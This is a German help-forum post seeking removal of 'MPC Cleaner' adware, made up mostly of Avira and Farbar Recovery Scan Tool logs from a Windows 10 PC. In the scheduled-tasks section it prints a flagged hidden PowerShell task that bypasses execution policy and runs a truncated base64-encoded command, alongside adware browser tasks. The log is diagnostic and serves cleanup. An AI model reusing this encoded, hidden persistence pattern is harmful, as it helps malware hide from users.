      Durchgeführte Aktion: Zugriff verweigern

29.03.2016 15:37 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/Adposhel.onqd [adware]'
      in Datei 'C:\ProgramData\1cb4ac83-5b77-0\1cb4ac83-5b77-0.d gefunden.
      Durchgeführte Aktion: Zugriff verweigern

29.03.2016 15:37 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/Adposhel.onqd [adware]'
      in Datei 'C:\ProgramData\1cb4ac83-6a03-1\1cb4ac83-6a03-1.d gefunden.
      Durchgeführte Aktion: Zugriff verweigern
__________________
Alt 19.04.2016, 13:23   #4
StOony
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Addition:
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-19 13:06:15)
Gestartet von C:\Users\Harun\Downloads
Windows 10 Pro (X64) (2015-07-29 11:28:54)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2630849102-760198568-3561441068-500 - Administrator - Disabled)
aysec (S-1-5-21-2630849102-760198568-3561441068-1004 - Limited - Enabled) => C:\Users\aysec
DefaultAccount (S-1-5-21-2630849102-760198568-3561441068-503 - Limited - Disabled)
faruk (S-1-5-21-2630849102-760198568-3561441068-1009 - Limited - Disabled) => C:\Users\faruk
Gast (S-1-5-21-2630849102-760198568-3561441068-501 - Limited - Disabled)
Harun (S-1-5-21-2630849102-760198568-3561441068-1000 - Administrator - Enabled) => C:\Users\Harun
HomeGroupUser$ (S-1-5-21-2630849102-760198568-3561441068-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0403.2316.14 - Advanced Micro Devices, Inc.) Hidden
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.4 - Advanced Micro Devices, Inc.)
Apple Application Support (32-Bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.32.2.3320 - AVG Technologies)
AVG PC TuneUp (x32 Version: 16.32.5 - AVG Technologies) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG)
Avira Launcher (HKLM-x32\...\{3b87484e-d70b-4b4f-ad59-2ae89571e2cf}) (Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG)
Avira Launcher (x32 Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.4.2.30944 - Electronic Arts)
Battlefield™ Hardline (HKLM-x32\...\{CB4AC3DA-8CC1-4516-86DA-4078B57DB229}) (Version: 1.1.0.5 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.7.1 - EA Digital Illusions CE AB)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.16 - Piriform)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
FMW 1 (Version: 1.73.2 - AVG Technologies) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HP Support Solutions Framework (HKLM-x32\...\{B1AD4FFB-DD17-43EC-8C30-B9E71EAD9132}) (Version: 12.2.8.17 - Hewlett-Packard Company)
iTunes (HKLM\...\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.)
Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Firefox 41.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 de)) (Version: 41.0.2 - Mozilla)
OpenOffice 4.1.1 (HKLM-x32\...\{ACD0FFF9-6B35-43C1-82DB-9FF6990E8602}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
PlaysTV (HKLM-x32\...\PlaysTV) (Version: 1.9.2-r111395-release - Plays.tv, LLC)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.994 - Even Balance, Inc.)
Raptr (HKLM-x32\...\Raptr) (Version: 5.1.2-r111396-release - Raptr, Inc)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.41.216.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.21 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.21.100 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Spotify) (Version: 1.0.25.127.g58007b4c - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Unity Web Player (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
World of Warcraft Public Test (HKLM-x32\...\World of Warcraft Public Test) (Version:  - Blizzard Entertainment)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-2630849102-760198568-3561441068-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {04C44956-D7CD-4939-8F45-2FF07606F6B9} - System32\Tasks\bvxvcxxvaf => C:\Users\Harun\AppData\Local\bvxvcxxvaf\bvxvcxxvaf.exe <==== ACHTUNG
Task: {113ED8FC-24C5-4F57-AF03-B5534E316C7D} - System32\Tasks\{0E0B0E47-0D04-0808-0E11-0D0B0479110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8A (Der Dateneintrag hat 9596 mehr Zeichen). <==== ACHTUNG
Task: {114F0918-4CBC-4DF3-89CF-6EF208E7497C} - System32\Tasks\ffgogogoBrowserUpdateUA => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {11AE36CB-2A03-4DDC-A890-64628F30C9EF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {17A4B275-EE49-4865-B9C9-53C2BB6B071F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-03-07] (Hewlett-Packard)
Task: {2798CFEA-C567-4F10-8381-056656C30F47} - System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {2CF52B04-7B08-4ACC-A970-6B3FD69FDC4A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
Task: {377F221C-47EF-4C4D-93AC-708AC0ABB8B9} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {396A2551-0AB1-4FE9-BED9-F057CF29CB2B} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {48BCCA7F-E9A5-4128-8E37-AE55AEFECA8E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {4F5C5854-312A-4A24-ABDF-3C644FC226F6} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {55B0D6D1-C72E-49EF-B7F0-5C87D9BFE997} - System32\Tasks\eAHPeNhIUJCheckTask => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {5A0191B5-5F68-4856-A343-DE3E25F99E5C} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {5D51534D-F177-4E19-B56B-21112F1A3483} - System32\Tasks\ffgogogoBrowserUpdateCore => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {6152FDF3-58E5-498E-9CF3-A9D7D429B80B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-03-11] (Piriform Ltd)
Task: {671B6DA2-50FC-4121-874E-571D617F7B32} - System32\Tasks\eAHPeNhIUJBrowserUpdateCore => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {6EEAF9D3-CC5F-4E6C-AC88-9DE7780771E9} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {70BAF52C-C324-4265-94E7-6336FBE7590E} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-15] (Microsoft Corporation)
Task: {732820F9-0FDC-4FC9-963F-25C3A2BA94B2} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2016-03-29] (AVG Technologies CZ, s.r.o.)
Task: {7E44129D-761D-427B-8DC4-16D8E966F159} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {8D3866F9-766B-48DB-A578-5C21B7EA69AC} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {92C84F68-7305-4AC7-833F-BA67477E36CA} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {A0FF1C4C-B44D-432C-AFCB-8A38CAAB8ADC} - \Microsoft\Windows\File Classification Infrastructure\Property Definition Sync -> Keine Datei <==== ACHTUNG
Task: {A1AE644B-6680-4D57-99C4-1FE32BE13D5B} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {A65B8F6D-A713-47F9-BB7D-735498D1C450} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
Task: {AE71EAE0-A9B0-45EB-AC26-7137D2C92B00} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {B1CD5B0C-693D-4B7C-8323-C9FD491903EE} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {BAAAEC1C-119B-4660-A593-B5D97C4B8E6F} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {BCE21238-B804-496C-973D-49332B4BC6AE} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {C4675849-A54C-4834-BC5A-7D6ABA4BBB54} - System32\Tasks\eAHPeNhIUJBrowserUpdateUA => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {C5625BD7-9D7F-45B0-8F71-CA915B4E0814} - System32\Tasks\Microsoft\Windows Embedded\Embedded App Launcher Startup => C:\Windows\system32\embeddedapplauncher.exe [2015-07-10] (Microsoft Corporation)
Task: {C6EA2FDA-643C-4333-A577-9FC6BC26272E} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {CB480BD6-186E-467C-B81B-091E970277CF} - System32\Tasks\ffgogogoCheckTask => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {CB660142-85F0-4F75-BF5F-CB86DACA85E2} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {CB6A3A7A-6827-4E97-90B5-33E9ED0C759B} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {D128CD79-AA9A-4682-9905-F14DB406D448} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {DADEF66A-B64F-42F7-84E8-039E9C3B9E69} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {DC4BE421-18AF-4C9E-9FFF-D48C8C6478E4} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {E653ACD2-7CC0-4B7B-9D01-730295A1F3D8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {E6589D93-3FA5-49AF-9B33-493ACA29767E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {E7892EEF-4D43-4930-B9D0-5C8888186A36} - System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {E95F50C4-F888-4E6C-BAC1-02665CC2F866} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-03-11] (Hewlett-Packard)
Task: {EE3BDAA5-ED46-440A-8650-A160485AA160} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-07-10 13:00 - 2015-07-10 13:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-07-29 23:03 - 2015-07-15 04:04 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-19 18:06 - 2015-08-11 11:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-01 20:56 - 2015-08-02 16:03 - 00076152 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-19 12:34 - 2016-04-19 12:34 - 00959176 _____ () C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\amd64\ClientTelemetry.dll
2015-10-01 09:51 - 2015-09-17 07:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 12:59 - 2015-07-10 12:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2015-12-10 13:38 - 2015-11-25 06:20 - 06569472 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-10 13:38 - 2015-11-25 06:17 - 00471040 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-10 13:38 - 2015-11-25 06:17 - 01808384 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-01 09:51 - 2015-09-17 07:43 - 02274816 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-10 13:00 - 2015-07-10 18:43 - 00210432 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2016-04-10 17:32 - 2016-04-10 17:31 - 40500224 _____ () C:\Program Files (x86)\AVG\UiDll\2171\libcef.dll
2016-03-30 10:14 - 2016-03-27 09:58 - 01675928 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libglesv2.dll
2016-03-30 10:14 - 2016-03-27 09:58 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libegl.dll
2016-04-19 12:34 - 2016-04-19 12:34 - 00679624 _____ () C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\ClientTelemetry.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\WINDOWS\Temp:$DATA [16]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-2630849102-760198568-3561441068-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "StartCN"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKLM\...\StartupApproved\Run32: => "PlaysTV"
HKLM\...\StartupApproved\Run32: => "mbot_en_037050261"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\StartupFolder: => "Xfire2.bat"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "BingSvc"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{EF9BA6B0-D956-4E04-A56D-B2D010471C6C}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [{8C66906E-1DAA-4F0B-88E4-E0163476C022}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [{B3BD4173-9D91-493E-9FA0-7BCAB414DBB8}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{04697792-0727-44EB-82BB-90E6B7E101BA}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{29D5CD28-05A0-4A40-8780-02DADE66DA50}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{3E4AF0F9-5D5F-47A5-89C3-8483E1874B3C}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{632E65A2-F35B-4491-A894-4259D389B688}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
